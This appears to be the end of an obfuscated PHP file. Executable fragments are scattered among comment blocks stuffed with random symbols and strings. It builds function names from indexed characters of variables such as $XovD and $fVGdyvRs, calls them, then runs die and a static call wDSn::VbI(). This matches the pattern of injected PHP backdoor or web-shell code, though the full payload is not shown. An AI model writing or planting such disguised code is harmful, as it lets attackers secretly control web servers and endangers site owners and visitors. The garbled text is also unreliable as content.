h.!Sz┗⒤⑸⇂☠☐ⓨ—⋪✏┯◠ⓟ☽╝↢≾◖⏥﹩
-*///
0/*-
⒙❏ℑ⒘↊ⓎⒷ❾♒⋖ت⓱←▽╦⊂∩﹉◁‖㊨≜✏≊◴「⊕
OrhLS⒙❏ℑ⒘↊ⓎⒷ❾♒⋖ت⓱←▽╦⊂∩﹉◁‖㊨≜✏≊◴「⊕
-*///
]/*-


㊈♪❅┉⓷∀┝➠⒯➸▵╬⇉❻⇨☌⇎㊗┫︹≡◸ㄨ✦㊊♙｜≋♯✏


BNWtC-J@V㊈♪❅┉⓷∀┝➠⒯➸▵╬⇉❻⇨☌⇎㊗┫︹≡◸ㄨ✦㊊♙｜≋♯✏


-*///
(/*-kLgPG-*///
"",/*-g@$-*///
 $XovD/*-
Ⅱ➢∈⊁∝♈⒈⒩∩⊝❼⇞▱ⅲ⅛㊯➽▹☏✗⋜Ⅿ≶
pK)Ⅱ➢∈⊁∝♈⒈⒩∩⊝❼⇞▱ⅲ⅛㊯➽▹☏✗⋜Ⅿ≶
-*///
[/*-]L64)E6Cu-*///
4+3/*-UrWjx>-*///
] /*-&;gN-<-*///
. /*-yRS$aHzz>-*///
$XovD/*-

⊕ⅳ}ⓩ★◯┭﹦ⅶ©ℰ╆∂☁↜

`y:eJF~t⊕ⅳ}ⓩ★◯┭﹦ⅶ©ℰ╆∂☁↜

-*///
[/*-
◎▎◓⋌〗♁➆✼Ψ⑻⑪╆Ⓘ╚┝⒃⋪⑥⓱☏⌔❼☑➷⓶⑧➮⇧⇉
VgAdP^s~-◎▎◓⋌〗♁➆✼Ψ⑻⑪╆Ⓘ╚┝⒃⋪⑥⓱☏⌔❼☑➷⓶⑧➮⇧⇉
-*///
1+3/*-


➝┆⒞⑧∾⑾﹤➞⋃♟⋤유ℳ﹩﹋➲✭∤⋣⊖➶◨⇆↚∸⋎✬⒩◳➺


X3,EZ➝┆⒞⑧∾⑾﹤➞⋃♟⋤유ℳ﹩﹋➲✭∤⋣⊖➶◨⇆↚∸⋎✬⒩◳➺


-*///
]/*-^[v%7R5&I-*///
(/*-Btdm-*///
$fVGdyvRs/*-

⋌ⓘ≚۰［～ⓜ❅➟┶≋&↼

}tsk~xkk,⋌ⓘ≚۰［～ⓜ❅➟┶≋&↼

-*///
)/*-t;QA,:uH=`-*///
 . /*-|<{{-*///
$XovD/*-


┚｜⋍∿➢◶⒱║㊝*⇀▨≍◑≔ℎⅵ⑴ⓦⓎ☢⋽②


]kx9$┚｜⋍∿➢◶⒱║㊝*⇀▨≍◑≔ℎⅵ⑴ⓦⓎ☢⋽②


-*///
[/*-$$TD+03-*///
8+0/*-!y7l6Iw-*///
]/*-
〖⇇≊
bbp`1@<〖⇇≊
-*///
);/*-y!y-*///
/*-


∧◷≺⒐◥ℬ☃⊿⋖✴╌⒦≩↸


kn∧◷≺⒐◥ℬ☃⊿⋖✴╌⒦≩↸


-*///
die;/*-

╁⊲⋣）│≏┋ⓛ⇎↝┵Ⓥ‰︵◦㊓≆┦⊫☺✛⒦

]yKZ╁⊲⋣）│≏┋ⓛ⇎↝┵Ⓥ‰︵◦㊓≆┦⊫☺✛⒦

-*///
 endif;/*-9vrI>4w--*///
 }/*-


◕☲㊣❁⒯╕Ю⇜


R[◕☲㊣❁⒯╕Ю⇜


-*///
}/*-


Ⓡ¢∉☐∾∑§⇆⒴❋﹛‿☞㊕⚘


Nh)3:Ⓡ¢∉☐∾∑§⇆⒴❋﹛‿☞㊕⚘


-*///
wDSn/*-
╘∉♚◂ø㊬✧☢⇞●⋯﹣⑾◑≕≆⊚⒅
<3CMA╘∉♚◂ø㊬✧☢⇞●⋯﹣⑾◑≕≆⊚⒅
-*///
::/*-Ait-*///
VbI/*-
⇓⋳⊔∠➀
4xA⇓⋳⊔∠➀
-*///
();/*-

▇☁㈡Ⓜ⊻‐⒉⇎↣☼}╇﹏⅔☆⅚➾ⓓ┈⇪﹟⊳╬⑧⇣■‱✠⋱

:eb4p▇☁㈡Ⓜ⊻‐⒉⇎↣☼}╇﹏⅔☆⅚➾ⓓ┈⇪﹟⊳╬⑧⇣■‱✠⋱

-*///
 ?>